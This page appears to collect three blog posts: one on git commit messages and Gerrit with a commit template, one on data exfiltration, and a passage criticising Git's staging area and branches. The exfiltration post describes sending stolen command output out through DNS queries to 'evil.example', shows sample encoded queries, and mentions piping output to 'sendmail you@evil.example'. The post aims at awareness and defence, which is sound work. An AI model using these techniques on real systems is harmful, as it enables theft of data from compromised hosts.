55 stories
·
0 followers

Of Git Commits, GitHub, and Gerrit

3 Shares

I am a connoisseur of fine git commit messages. I also find myself in the unenviable position of Gerrit defender. These two facts are not entirely unrelated.

Impassioned ranting about the format of commit messages1 often feels like cringe-inducing gatekeeping. Many times such rants seem to be written using language both bombastic and bellicose – the message is: fuck off if you don’t agree.

The fact that the authors of many of these rants tend to be respected in the software community is confounding to many. Defense of these rants is commonplace and, likewise, is swift, absolute, and equally, seemingly, meant as a giant middle-finger to the uninitiated.

Explaining new concepts to people unfamiliar with them is a good way of testing your understanding. Explaining new concepts repeatedly, in a seemingly unending cycle, is a good test of your patience. Neither lack of understanding or lack of patience excuse the bad behavior that is all-too-typical of the software hegemony.

This post is meant to explain when and why commit messages matter. Additionally, it explains a few thoughts about the Gerrit code review system.

Pull Request vs Commit

The common wisdom is that commit messages don’t matter on GitHub. When I collaborate on GitHub I commit often and my commit messages frequently contain “.gif”, ¯\_(ツ)_/¯, various curse words, and copious emoji. This is because the unit of change in GitHub is the pull request. My pull requests are thoughtful, and attempt to explain why I developed this particular patch, and try to provide means of testing for this change. When trying to bisect history in a repository developed on GitHub the merges of pull requests are the thing; i.e., Merge pull request #763 is meaningful. Pull request #763 probably has an explanation for what changed (even if your git log doesn’t).

The information contianed in a pull request is useful, but is – by design – only accessible online with a web browser through github.com.

My current job uses Gerrit instead of GitHub. Gerrit doesn’t have pull requests, it has patches. The code review interface is arguably not as good as GitHub – I can’t set a unified diff view by default in my preferences, for instance. Gitiles is no substitute for using GitHub as a repo browser – you can’t link to blocks of code, for instance. Gerrit/Gitiles URLs are hard to remember, unlike GitHub’s. There is little in the way of a “prescribed workflow”. You as a developer must decide how to split patches meaningfully, and how to do that in such a way that adheres with any shared agreements about particular branches (e.g., master must be deployable).

Despite its flaws, I really like Gerrit.

Gerrit’s use of git aligns well with git’s design. The git history that Gerrit produces is beautiful, available offline, distributed, and useable via the git command line interface (more usable than in the browser, unfortunately). This is partially because the unit of change in Gerrit is a commit. As a result, git log --oneline is totally readable and totally useful!

I prefer the repo produced by Gerrit to the repo produced by GitHub for reasons that relate to development, operations, and values.

Development

If I’m considering making a change in a repository, especially when this change is an obvious or simple one, I worry. I worry: why wasn’t this approach chosen in the first place? Is there a bug that is being worked around by using a non-obvious approach? Am I in an area of code that is used in many areas of the code base, or is it used very seldom? Is there test coverage for this function that I can use to ensure I am not creating a regression? A good commit message would answer all of these questions, and maybe more I haven’t thought of yet.

This information in Gerrit lives with the repository, in GitHub the information lives on github.com. It’s very important that the information exist somewhere.

I like the freedom to work on code when I’m on an airplane or somewhere else without WiFi. There may be software that can make this happen for GitHub. In Gerrit the unit-of-change is the Commit, so the commit has most information that I want. With the addition of the review-notes Gerrit plugin, code reviews live in a special git note namespace (/refs/notes/review) and are also available with the repository offline.

Gerrit makes no recommendations whatsoever about how you develop, and nothing in the patch interface aligns with your local view of your changes necessarily. I feel like this is confusing for people new to using Gerrit, but it is also, after initiation to the concept, not a bad way to develop.

Operations

An appreciable portion of my job is greping through git history in the shaky moments following an embarrassing production outage. This exercise has given me a deep appreciation for well formatted git commit messages. I need to know: what changed, who changed it (not just who merged it), why it was changed, and why a particular approach was chosen.

Good commit message information helps me determine what to do with a change: do I need to wake up the person who made this commit, or can I simply revert it? Is this change merely setting an unused variable, or is it a feature flag that will unleash new functionality?

Having all this information at my fingertips, rather than having to dig through the 188(!) different repositories that are composed to create a production deployment of MediaWiki and extensions for all 933 wikis that exist in Wikimedia’s production infrastructure is important – I already have too many browser tabs open without having to dig through GitHub for repository histories.

Values

This section speaks more to my feelings about Gerrit vs GitHub as projects more than Gerrit vs GitHub repositories. In the case of GitHub’s use of pull requests, I feel like the two are inextricably linked – GitHub has opted out of the open source implementation of git using proprietary software to implement this feature and the resultant repository is less usable as an artifact on its own because of this decision.

The essay Free software needs Free tools is probably a better summary of this topic than anything I could write here; however, the short version of this is: without the freedom to run, modify, study, and redistribute the software on which your project depends, your project is at the mercy of corporate caprice.

Corporations are beholden to shareholders, not to users. When a corporation pivots away from the customers that made it a success to serve a different market that it perceives as more valuable that is not an uncommon or remarkable event: that is the design of a corporation.

If you are working on a software project that’s important – if your software provides an essential service, or essential infrastructure that is meant to last many years (even beyond a single human lifetime) – you cannot afford to lose a part of your infrastructure in the event that a (possibly erroneous) business analysis has identified a more efficient profit-center for a business.

There are many counter-arguments to the ones I’ve made above; however, to summarize a few counter-arguments (possibly unfairly) they are:

  1. <Closed Source/Hosted provider>‘s core business is acting in their customers’ best interest, if its goal is to provide value to shareholders then to do so means being a better service for its existing customers. Our interests and the business’s interests are aligned.
  2. <Closed Source/Hosted provider> is based on an open standard, so the information is portable, if they become a bad actor, we can port information to a different solution.

To argument one: there are myriad examples of business decisions made at the expense of customers. This is particularly true once a business entity becomes a monopoly power as so many tech companies are at this moment. I think anyone would concede the example of large cable companies offering poor service to customers despite the fact that customers provide their revenue. Business interests and customer interests, even when they are currently aligned, may not always be.

To argument two: in the instance of GitHub above (and this is applicable to other services as well) they have proprietary features (i.e., “pull requests”) that make them incompatible with portability. In other instances, the compatibility with a portable solution is invalidated by the point of business caprice.

How I commit now

If commit messages are important (as I argue above), then it is a valuable exercise to evaluate the way in which you write your commit messages.

Earlier this year I came across Vicky Lai’s post “Git Commit Practices Your Future Self Will Thank You For” Which (for me anyway) highlighted the use of the git commit.template. Vicky provided an example in the post that I’ve been refining for myself.

I’ve followed git commit best practices234 for years, so initially the template wasn’t proving too useful. I started to think about what was missing from my commit messages, where I could improve formatting, and where I could save myself some time searching.

The first issue I identified is that I can’t remember the names of commit message fields like Signed-off-by or Requested-by. Also, my capitalization and ordering of those fields was all over the place. What are the best-practices for using these fields? I could never remember. I put all these fields in my template. Along with a link to the kernel patch submission guidelines for easy reference.

The next issue I had was that there are myriad schools of thought about commit message bodies. Bullet points vs Problem/Solution vs “answers the following questions”. The basic questions of “What is wrong with the code that this patch fixes?” sometimes hindered my ability to write a commit message that made sense. I wanted options. I wanted examples. I wanted links in case I felt like reading more. I added all this to my template.

Finally, I noticed that vim does some syntax highlighting in the commit screen. Specifically, lines that end with :. So I made sure that the only lines that ended with : were important sections.

I think I have a template I can live with for a while. It’s verbose. Probably too verbose, really. But my mind works in ways I don’t understand sometimes. To keep it on track, I need all the information it craves at my fingertips in a context-dependant way. I think this template is ideal for that.

Git Commit ZOMG!!1!

The commit.template below is in my dotfiles as .git-commit-zomg. I install the template using the command git config --global commit.template ~/.git-commit-zomg.

I named this template .git-commit-zomg because I have mixed feelings about commit messages. I think a lot about commit messages. I think they’re important. I evidently feel that they’re “rant worthy” in some context. I still, however, know people will decide the value of commit messages on their own. You can tell people the value you think commit messages will have, and they’ll maybe ackowledge your concerns are valid. Maybe they’ll even make changes in their process. But no one groks to fullness.

Someday production will be down. Rollback will have failed with an opaque error. Your mind will be screaming too loud for you to think clearly. You’ll frantically grep git log output for the error message – something, anything – and you’ll come face-to-face with a commit (probably authored by you) that reads, simply, ¯\_(ツ)_/¯. To paraphrase Jack Handy: when this moment comes, if you’re drinking milk, I bet it will make milk come out your nose.


# ^^ Subject: summary of your change:
# * 50 Characters is a soft limit (aim for < 80)
# * "If applied, this commit will..."
# * Use the imperative mood; e.g.,
#   (Change/Add/Fix/Remove/Update/Refactor/Document)
# * Do not end the subject with a period (full stop)
# * Optionally, prefix the subject with the relevant component
#   (the general area of code being modified)
#
# Example[0]
#
#     jquery.badge: Add ability to display the number zero
#
# [0]. <https://www.mediawiki.org/wiki/Gerrit/Commit_message_guidelines#Subject>
#
# Leave this blank line below your subject:

# Body: Additional information about a commit:

# Think about these questions
#
# * Why should this change should be made?
#   What is wrong with the current code?
# * Why should it be changed in this way?
#   Are there other ways?
# * How can a reviewer confirm that your change works as intended?[0]
#
# * An alternative format maybe a problem/solution commit as used in
#   ZeroMQ[1]; e.g.
#
#       * Problem: Windows build script requires edit of VS version
#       * Solution: Use CMD.EXE environment variable to extract
#         DevStudio version number and build using it.
#
# [0]. <https://www.mediawiki.org/wiki/Gerrit/Commit_message_guidelines#Body>
# [1]. <http://zeromq.org/docs:contributing#toc3>

# ---
#
# Bug number:
#
# Bug: TXXXXXX
#
# ---
#
# Gerrit specific:
#
# Change-Id: IXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# Depends-On: IXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
#
# ---
#
# Sign your work:
#
# > The sign-off is a simple line at the end of the explanation for the
# > patch, which certifies that you wrote it or otherwise have the right to
# > pass it on as a open-source patch [0]
#
# Signed-off-by: Example User <user@example.com>
#
# [0]. <https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/Documentation/SubmittingPatches?id=4e8a2372f9255a1464ef488ed925455f53fbdaa1>
#
# ---
#
# Other Nice Things:
#
# If you worked on a patch with others it's nice to credit them for
# their contributions; however, these tags should not be added without
# your collaborator's permission!

# Acked-by: Example User <user@example.com>
# Cc: Example User <user@example.com>
# Co-Authored-by: Example User <user@example.com>
# Requested-by: Example User <user@example.com>
# Reported-by: Example User <user@example.com>
# Reviewed-by: Example User <user@example.com>
# Suggested-by: Example User <user@example.com>
# Tested-by: Example User <user@example.com>
# Thanks: Example User <user@example.com>
#
# ---
#        _ _                                   _ _
#   __ _(_) |_    ___ ___  _ __ ___  _ __ ___ (_) |_   _______  _ __ ___   __ _
#  / _` | | __|  / __/ _ \| '_ ` _ \| '_ ` _ \| | __| |_  / _ \| '_ ` _ \ / _` |
# | (_| | | |_  | (_| (_) | | | | | | | | | | | | |_   / / (_) | | | | | | (_| |
#  \__, |_|\__|  \___\___/|_| |_| |_|_| |_| |_|_|\__| /___\___/|_| |_| |_|\__, |
#  |___/                                                                  |___/
#
# Save to `~/.git-commit-zomg` Then run:
#
#     git config --global commit.template ~/.git-commit-zomg
#
# The idea for this template came from Vicky Lai[0]
#
# [0]. <https://vickylai.com/verbose/git-commit-practices-your-future-self-will-thank-you-for/>

  1. https://github.com/torvalds/linux/pull/17#issuecomment-5654674

  2. https://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html

  3. https://www.mediawiki.org/wiki/Gerrit/Commit_message_guidelines

  4. https://juffalow.com/other/write-good-git-commit-message

Read the whole story
miestasmagnus
2132 days ago
reply
brennen
2138 days ago
reply
Boulder, CO
Share this story
Delete

Exfiltration, correctness, and the race to market

1 Share

Let's say you're a bad person, and you've managed to break into a machine inside some organization. Maybe you can't get to it directly, but you can inject some payload which eventually makes some machine inside the beast run your command. How do you get the results out? Assume that you can't just connect to the outside world -- there's a firewall preventing it.

The magic of getting this stuff out of the hard-to-reach machine and back to you is known as exfiltration, and not everyone defends against it. I've seen a couple of interesting techniques over the years. None of this should be news to anyone working in the security space, but I figure they're worth mentioning for folks who haven't encountered them yet.

For starters, how about DNS? If you control a domain, evil.example, and you run the nameservers, then every single request that isn't cached somewhere out in the world will come direct to your machines. What are the odds that a machine inside a typical tech company will be able to resolve arbitrary DNS hosts, inside and out? I'd say pretty good.

All you'd have to do is make sure the data would fit in a request, glue your domain on the end, and fire it off. You could do this with any tool which generates DNS lookups - it doesn't have to be dig or host... how about telnet, or netcat, or ping?

Do you think anyone would notice this? I'm guessing many places would not. Sure, if you've already invested in some kind of "behavior based" firewalling stuff which looks for strange things happening, it might catch it, but I would have to hope such a place already cut DNS off from the outside world.

Put another way, would you notice DNS queries like this?

dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3.001.evil.example JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFl.002.evil.example bW9uKSwzKHN5cyksNChhZG0pLDYoZGlzay.003.evil.example ksMTAod2hlZWwpLDExKGZsb3BweSksMTco.004.evil.example YXVkaW8pCg==.005.evil.example

Five DNS queries later, someone knows they managed to get their command to run somewhere, and that it's running with root privileges on the box. Party time!

So maybe you fix that one, and make it so that internal hosts can only resolve other internal domains. Good for you, since this can be surprisingly difficult to get right without breaking anything else. There are still other fun ways to get stuff out.

How about SMTP? You know, good old e-mail. If the machine is running sendmail or postfix or something else of that sort, it's probably doing it for a reason. Why not try to just pipe some command into 'sendmail you@evil.example' and see if it gets there? You might be surprised how just many places have huge corporate relaying infrastructures set up "just in case" a machine wants to mail the outside world. The compromised host might not be able to hit your port 25, but I bet it knows a friend who does!

Now, the machine itself might generate a from address that doesn't resolve on the outside world, so you'll have to make sure your receiving host(s) allow such shenanigans, but you already set that up, right?

Obviously there are also the hosts which "helpfully" set up a http[s] proxy for everyone on the box, so you can just wget or curl something and it'll Just Work. It'll bounce out through some corporate proxy or somesuch, and the data will be deposited on your electronic doorstep, all wrapped up in a neat little package. This one is hopefully a given so I didn't lead with it. If this exists, you don't need the more interesting methods.

By the way, if you choose to lock down your systems so that this kind of stuff doesn't work, you might also take the chance to not just bitbucket the traffic. If hosts should never resolve the outside world, maybe provide a resolver which pretends to answer for all of them, but logs the attempts anyway. Or, if they should never mail the world, accept the mail and see where it's going. Or have a dummy http[s] proxy which just gobbles the request and holds on to the payload for later analysis.

Obviously, all of this should already exist on the marketplace and should Just Work for everyone, but for a random web company with 100-1000 machines and a handful of employees, are they thinking about this? I'm guessing they are not. They're just trying to stay afloat and get some kind of footing with their market. Engineering and security correctness are probably way down the list of things they care about.

The sad part is that the places which do put that stuff first probably don't make it to market in time (or ever), wind up failing, and so their hard work means nothing. If this turns out to be true, then you'll see a pattern of companies throwing up literally whatever crap they can get to run, and then if it sticks and they make money, then they come back and "backfill" and try to pay down the technical debt they imposed on themselves.

This is a good reason why a bunch of online services are just plain terrifying. The paths to viability usually involve a great many awful compromises, both in terms of "we'll just have to get to that later" and "oops, we've been owned".

I think this is one of the valley's dirty little secrets. Sorry, world.

Read the whole story
miestasmagnus
2480 days ago
reply
Share this story
Delete

High-level Problems with Git and How to Fix Them

1 Share

I have a... complicated relationship with Git.

When Git first came onto the scene in the mid 2000's, I was initially skeptical because of its horrible user interface. But once I learned it, I appreciated its speed and features - especially the ease at which you could create feature branches, merge, and even create commits offline (which was a big deal in the era when Subversion was the dominant version control tool in open source and you needed to speak with a server in order to commit code). When I started using Git day-to-day, it was such an obvious improvement over what I was using before (mainly Subversion and even CVS).

When I started working for Mozilla in 2011, I was exposed to the Mercurial version control, which then - and still today - hosts the canonical repository for Firefox. I didn't like Mercurial initially. Actually, I despised it. I thought it was slow and its features lacking. And I frequently encountered repository corruption.

My first experience learning the internals of both Git and Mercurial came when I found myself hacking on hg-git - a tool that allows you to convert Git and Mercurial repositories to/from each other. I was hacking on hg-git so I could improve the performance of converting Mercurial repositories to Git repositories. And I was doing that because I wanted to use Git - not Mercurial - to hack on Firefox. I was trying to enable an unofficial Git mirror of the Firefox repository to synchronize faster so it would be more usable. The ulterior motive was to demonstrate that Git is a superior version control tool and that Firefox should switch its canonical version control tool from Mercurial to Git.

In what is a textbook definition of irony, what happened instead was I actually learned how Mercurial worked, interacted with the Mercurial Community, realized that Mozilla's documentation and developer practices were... lacking, and that Mercurial was actually a much, much more pleasant tool to use than Git. It's an old post, but I summarized my conversion four and a half years ago. This started a chain of events that somehow resulted in me contributing a ton of patches to Mercurial, taking stewardship of hg.mozilla.org, and becoming a member of the Mercurial Steering Committee - the governance group for the Mercurial Project.

I've been an advocate of Mercurial over the years. Some would probably say I'm a Mercurial fanboy. I reject that characterization because fanboy has connotations that imply I'm ignorant of realities. I'm well aware of Mercurial's faults and weaknesses. I'm well aware of Mercurial's relative lack of popularity, I'm well aware that this lack of popularity almost certainly turns away contributors to Firefox and other Mozilla projects because people don't want to have to learn a new tool. I'm well aware that there are changes underway to enable Git to scale to very large repositories and that these changes could threaten Mercurial's scalability advantages over Git, making choices to use Mercurial even harder to defend. (As an aside, the party most responsible for pushing Git to adopt architectural changes to enable it to scale these days is Microsoft. Could anyone have foreseen that?!)

I've achieved mastery in both Git and Mercurial. I know their internals and their command line interfaces extremely well. I understand the architecture and principles upon which both are built. I'm also exposed to some very experienced and knowledgeable people in the Mercurial Community. People who have been around version control for much, much longer than me and have knowledge of random version control tools you've probably never heard of. This knowledge and exposure allows me to make connections and see opportunities for version control that quite frankly most do not.

In this post, I'll be talking about some high-level, high-impact problems with Git and possible solutions for them. My primary goal of this post is to foster positive change in Git and the services around it. While I personally prefer Mercurial, improving Git is good for everyone. Put another way, I want my knowledge and perspective from being part of a version control community to be put to good wherever it can.

Speaking of Mercurial, as I said, I'm a heavy contributor and am somewhat influential in the Mercurial Community. I want to be clear that my opinions in this post are my own and I'm not speaking on behalf of the Mercurial Project or the larger Mercurial Community. I also don't intend to claim that Mercurial is holier-than-thou. Mercurial has tons of user interface failings and deficiencies. And I'll even admit to being frustrated that some systemic failings in Mercurial have gone unaddressed for as long as they have. But that's for another post. This post is about Git. Let's get started.

The Staging Area

The staging area is a feature that should not be enabled in the default Git configuration.

Most people see version control as an obstacle standing in the way of accomplishing some other task. They just want to save their progress towards some goal. In other words, they want version control to be a save file feature in their workflow.

Unfortunately, modern version control tools don't work that way. For starters, they require people to specify a commit message every time they save. This in of itself can be annoying. But we generally accept that as the price you pay for version control: that commit message has value to others (or even your future self). So you must record it.

Most people want the barrier to saving changes to be effortless. A commit message is already too annoying for many users! The Git staging area establishes a higher barrier to saving. Instead of just saving your changes, you must first stage your changes to be saved.

If you requested save in your favorite GUI application, text editor, etc and it popped open a select the changes you would like to save dialog, you would rightly think just save all my changes already, dammit. But this is exactly what Git does with its staging area! Git is saying I know all the changes you made: now tell me which changes you'd like to save. To the average user, this is infuriating because it works in contrast to how the save feature works in almost every other application.

There is a counterargument to be made here. You could say that the editor/application/etc is complex - that it has multiple contexts (files) - that each context is independent - and that the user should have full control over which contexts (files) - and even changes within those contexts - to save. I agree: this is a compelling feature. However, it isn't an appropriate default feature. The ability to pick which changes to save is a power-user feature. Most users just want to save all the changes all the time. So that should be the default behavior. And the Git staging area should be an opt-in feature.

If intrinsic workflow warts aren't enough, the Git staging area has a horrible user interface. It is often referred to as the cache for historical reasons. Cache of course means something to anyone who knows anything about computers or programming. And Git's use of cache doesn't at all align with that common definition. Yet the the terminology in Git persists. You have to run commands like git diff --cached to examine the state of the staging area. Huh?!

But Git also refers to the staging area as the index. And this terminology also appears in Git commands! git help commit has numerous references to the index. Let's see what git help glossary has to say::

index
    A collection of files with stat information, whose contents are
    stored as objects. The index is a stored version of your working tree.
    Truth be told, it can also contain a second, and even a third
    version of a working tree, which are used when merging.

index entry
    The information regarding a particular file, stored in the index.
    An index entry can be unmerged, if a merge was started, but not
    yet finished (i.e. if the index contains multiple versions of that
    file).

In terms of end-user documentation, this is a train wreck. It tells the lay user absolutely nothing about what the index actually is. Instead, it casually throws out references to stat information (requires the user know what the stat() function call and struct are) and objects (a Git term for a piece of data stored by Git). It even undermines its own credibility with that truth be told sentence. This definition is so bad that it would probably improve user understanding if it were deleted!

Of course, git help index says No manual entry for gitindex. So there is literally no hope for you to get a concise, understandable definition of the index. Instead, it is one of those concepts that you think you learn from interacting with it all the time. Oh, when I git add something it gets into this state where git commit will actually save it.

And even if you know what the Git staging area/index/cached is, it can still confound you. Do you know the interaction between uncommitted changes in the staging area and working directory when you git rebase? What about git checkout? What about the various git reset invocations? I have a confession: I can't remember all the edge cases either. To play it safe, I try to make sure all my outstanding changes are committed before I run something like git rebase because I know that will be safe.

The Git staging area doesn't have to be this complicated. A re-branding away from index to staging area would go a long way. Adding an alias from git diff --staged to git diff --cached and removing references to the cache from common user commands would make a lot of sense and reduce end-user confusion.

Of course, the Git staging area doesn't really need to exist at all! The staging area is essentially a soft commit. It performs the save progress role - the basic requirement of a version control tool. And in some aspects it is actually a better save progress implementation than a commit because it doesn't require you to type a commit message! Because the staging area is a soft commit, all workflows using it can be modeled as if it were a real commit and the staging area didn't exist at all! For example, instead of git add --interactive + git commit, you can run git commit --interactive. Or if you wish to incrementally add new changes to an in-progress commit, you can run git commit --amend or git commit --amend --interactive or git commit --amend --all. If you actually understand the various modes of git reset, you can use those to uncommit. Of course, the user interface to performing these actions in Git today is a bit convoluted. But if the staging area didn't exist, new high-level commands like git amend and git uncommit could certainly be invented.

To the average user, the staging area is a complicated concept. I'm a power user. I understand its purpose and how to harness its power. Yet when I use Mercurial (which doesn't have a staging area), I don't miss the staging area at all. Instead, I learn that all operations involving the staging area can be modeled as other fundamental primitives (like commit amend) that you are likely to encounter anyway. The staging area therefore constitutes an unnecessary burden and cognitive load on users. While powerful, its complexity and incurred confusion does not justify its existence in the default Git configuration. The staging area is a power-user feature and should be opt-in by default.

Branches and Remotes Management is Complex and Time-Consuming

When I first used Git (coming from CVS and Subversion), I thought branches and remotes were incredible because they enabled new workflows that allowed you to easily track multiple lines of work across many repositories. And ~10 years later, I still believe the workflows they enable are important. However, having amassed a broader perspective, I also believe their implementation is poor and this unnecessarily confuses many users and wastes the time of all users.

My initial zen moment with Git - the time when Git finally clicked for me - was when I understood Git's object model: that Git is just a content indexed key-value store consisting of a different object types (blobs, trees, and commits) that have a particular relationship with each other. Refs are symbolic names pointing to Git commit objects. And Git branches - both local and remote - are just refs having a well-defined naming convention (refs/heads/<name> for local branches and refs/remotes/<remote>/<name> for remote branches). Even tags and notes are defined via refs.

Refs are a necessary primitive in Git because the Git storage model is to throw all objects into a single, key-value namespace. Since the store is content indexed and the key name is a cryptographic hash of the object's content (which for all intents and purposes is random gibberish to end-users), the Git store by itself is unable to locate objects. If all you had was the key-value store and you wanted to find all commits, you would need to walk every object in the store and read it to see if it is a commit object. You'd then need to buffer metadata about those objects in memory so you could reassemble them into say a DAG to facilitate looking at commit history. This approach obviously doesn't scale. Refs short-circuit this process by providing pointers to objects of importance. It may help to think of the set of refs as an index into the Git store.

Refs also serve another role: as guards against garbage collection. I won't go into details about loose objects and packfiles, but it's worth noting that Git's key-value store also behaves in ways similar to a generational garbage collector like you would find in programming languages such as Java and Python. The important thing to know is that Git will garbage collect (read: delete) objects that are unused. And the mechanism it uses to determine which objects are unused is to iterate through refs and walk all transitive references from that initial pointer. If there is an object in the store that can't be traced back to a ref, it is unreachable and can be deleted.

Reflogs maintain the history of a value for a ref: for each ref they contain a log of what commit it was pointing to, when that pointer was established, who established it, etc. Reflogs serve two purposes: facilitating undoing a previous action and holding a reference to old data to prevent it from being garbage collected. The two use cases are related: if you don't care about undo, you don't need the old reference to prevent garbage collection.

This design of Git's store is actually quite sensible. It's not perfect (nothing is). But it is a solid foundation to build a version control tool (or even other data storage applications) on top of.

The title of this section has to do with sub-optimal branches and remotes management. But I've hardly said anything about branches or remotes! And this leads me to my main complaint about Git's branches and remotes: that they are very thin veneer over refs. The properties of Git's underlying key-value store unnecessarily bleed into user-facing concepts (like branches and remotes) and therefore dictate sub-optimal practices. This is what's referred to as a leaky abstraction.

I'll give some examples.

As I stated above, many users treat version control as a save file step in their workflow. I believe that any step that interferes with users saving their work is user hostile. This even includes writing a commit message! I already argued that the staging area significantly interferes with this critical task. Git branches do as well.

If we were designing a version control tool from scratch (or if you were a new user to version control), you would probably think that a sane feature/requirement would be to update to any revision and start making changes. In Git speak, this would be something like git checkout b201e96f, make some file changes, git commit. I think that's a pretty basic workflow requirement for a version control tool. And the workflow I suggested is pretty intuitive: choose the thing to start working on, make some changes, then save those changes.

Let's see what happens when we actually do this:

$ git checkout b201e96f
Note: checking out 'b201e96f'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at b201e96f94... Merge branch 'rs/config-write-section-fix' into maint

$ echo 'my change' >> README.md
$ git commit -a -m 'my change'
[detached HEAD aeb0c997ff] my change
 1 file changed, 1 insertion(+)

$ git push indygreg
fatal: You are not currently on a branch.
To push the history leading to the current (detached HEAD)
state now, use

    git push indygreg HEAD:<name-of-remote-branch>

$ git checkout master
Warning: you are leaving 1 commit behind, not connected to
any of your branches:

  aeb0c997ff my change

If you want to keep it by creating a new branch, this may be a good time
to do so with:

 git branch <new-branch-name> aeb0c997ff

Switched to branch 'master'
Your branch is up to date with 'origin/master'.

I know what all these messages mean because I've mastered Git. But if you were a newcomer (or even a seasoned user), you might be very confused. Just so we're on the same page, here is what's happening (along with some commentary).

When I run git checkout b201e96f, Git is trying to tell me that I'm potentially doing something that could result in the loss of my data. A golden rule of version control tools is don't lose the user's data. When I run git checkout, Git should be stating the risk for data loss very clearly. But instead, the If you want to create a new branch sentence is hiding this fact by instead phrasing things around retaining commits you create rather than the possible loss of data. It's up to the user to make the connection that retaining commits you create actually means don't eat my data. Preventing data loss is critical and Git should not mince words here!

The git commit seems to work like normal. However, since we're in a detached HEAD state (a phrase that is likely gibberish to most users), that commit isn't referred to by any ref, so it can be lost easily. Git should be telling me that I just committed something it may not be able to find in the future. But it doesn't. Again, Git isn't being as protective of my data as it needs to be.

The failure in the git push command is essentially telling me I need to give things a name in order to push. Pushing is effectively remote save. And I'm going to apply my reasoning about version control tools not interfering with save to pushing as well: Git is adding an extra barrier to remote save by refusing to push commits without a branch attached and by doing so is being user hostile.

Finally, we git checkout master to move to another commit. Here, Git is actually doing something halfway reasonable. It is telling me I'm leaving commits behind, which commits those are, and the command to use to keep those commits. The warning is good but not great. I think it needs to be stronger to reflect the risk around data loss if that suggested Git commit isn't executed. (Of course, the reflog for HEAD will ensure that data isn't immediately deleted. But users shouldn't need to involve reflogs to not lose data that wasn't rewritten.)

The point I want to make is that Git doesn't allow you to just update and save. Because its dumb store requires pointers to relevant commits (refs) and because that requirement isn't abstracted away or paved over by user-friendly features in the frontend, Git is effectively requiring end-users to define names (branches) for all commits. If you fail to define a name, it gets a lot harder to find your commits, exchange them, and Git may delete your data. While it is technically possible to not create branches, the version control tool is essentially unusable without them.

When local branches are exchanged, they appear as remote branches to others. Essentially, you give each instance of the repository a name (the remote). And branches/refs fetched from a named remote appear as a ref in the ref namespace for that remote. e.g. refs/remotes/origin holds refs for the origin remote. (Git allows you to not have to specify the refs/remotes part, so you can refer to e.g. refs/remotes/origin/master as origin/master.)

Again, if you were designing a version control tool from scratch or you were a new Git user, you'd probably think remote refs would make good starting points for work. For example, if you know you should be saving new work on top of the master branch, you might be inclined to begin that work by running git checkout origin/master. But like our specific-commit checkout above:

$ git checkout origin/master
Note: checking out 'origin/master'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at 95ec6b1b33... RelNotes: the eighth batch

This is the same message we got for a direct checkout. But we did supply a ref/remote branch name. What gives? Essentially, Git tries to enforce that the refs/remotes/ namespace is read-only and only updated by operations that exchange data with a remote, namely git fetch, git pull, and git push.

For this to work correctly, you need to create a new local branch (which initially points to the commit that refs/remotes/origin/master points to) and then switch/activate that local branch.

I could go on talking about all the subtle nuances of how Git branches are managed. But I won't.

If you've used Git, you know you need to use branches. You may or may not recognize just how frequently you have to type a branch name into a git command. I guarantee that if you are familiar with version control tools and workflows that aren't based on having to manage refs to track data, you will find Git's forced usage of refs and branches a bit absurd. I half jokingly refer to Git as Game of Refs. I say that because coming from Mercurial (which doesn't require you to name things), Git workflows feel to me like all I'm doing is typing the names of branches and refs into git commands. I feel like I'm wasting my precious time telling Git the names of things only because this is necessary to placate the leaky abstraction of Git's storage layer which requires references to relevant commits.

Git and version control doesn't have to be this way.

As I said, my Mercurial workflow doesn't rely on naming things. Unlike Git, Mercurial's store has an explicit (not shared) storage location for commits (changesets in Mercurial parlance). And this data structure is ordered, meaning a changeset later always occurs after its parent/predecessor. This means that Mercurial can open a single file/index to quickly find all changesets. Because Mercurial doesn't need pointers to commits of relevance, names aren't required.

My Zen of Mercurial moment came when I realized you didn't have to name things in Mercurial. Having used Git before Mercurial, I was conditioned to always be naming things. This is the Git way after all. And, truth be told, it is common to name things in Mercurial as well. Mercurial's named branches were the way to do feature branches in Mercurial for years. Some used the MQ extension (essentially a port of quilt), which also requires naming individual patches. Git users coming to Mercurial were missing Git branches and Mercurial's bookmarks were a poor port of Git branches.

But recently, more and more Mercurial users have been coming to the realization that names aren't really necessary. If the tool doesn't actually require naming things, why force users to name things? As long as users can find the commits they need to find, do you actually need names?

As a demonstration, my Mercurial workflow leans heavily on the hg show work and hg show stack commands. You will need to enable the show extension by putting the following in your hgrc config file to use them:

[extensions]
show =

Running hg show work (I have also set the config commands.show.aliasprefix=sto enable me to type hg swork) finds all in-progress changesets and other likely-relevant changesets (those with names and DAG heads). It prints a concise DAG of those changesets:

hg show work output

And hg show stack shows just the current line of work and its relationship to other important heads:

hg show stack output

Aside from the @ bookmark/name set on that top-most changeset, there are no names! (That @ comes from the remote repository, which has set that name.)

Outside of code archeology workflows, hg show work shows the changesets I care about 95% of the time. With all I care about (my in-progress work and possible rebase targets) rendered concisely, I don't have to name things because I can just find whatever I'm looking for by running hg show work! Yes, you need to run hg show work, visually scan for what you are looking for, and copy a (random) hash fragment into a number of commands. This sounds like a lot of work. But I believe it is far less work than naming things. Only when you practice this workflow do you realize just how much time you actually spend finding and then typing names in to hg and - especailly - git commands! The ability to just hg update to a changeset and commit without having to name things is just so liberating. It feels like my version control tool is putting up fewer barriers and letting me work quickly.

Another benefit of hg show work and hg show stack are that they present a concise DAG visualization to users. This helps educate users about the underlying shape of repository data. When you see connected nodes on a graph and how they change over time, it makes it a lot easier to understand concepts like merge and rebase.

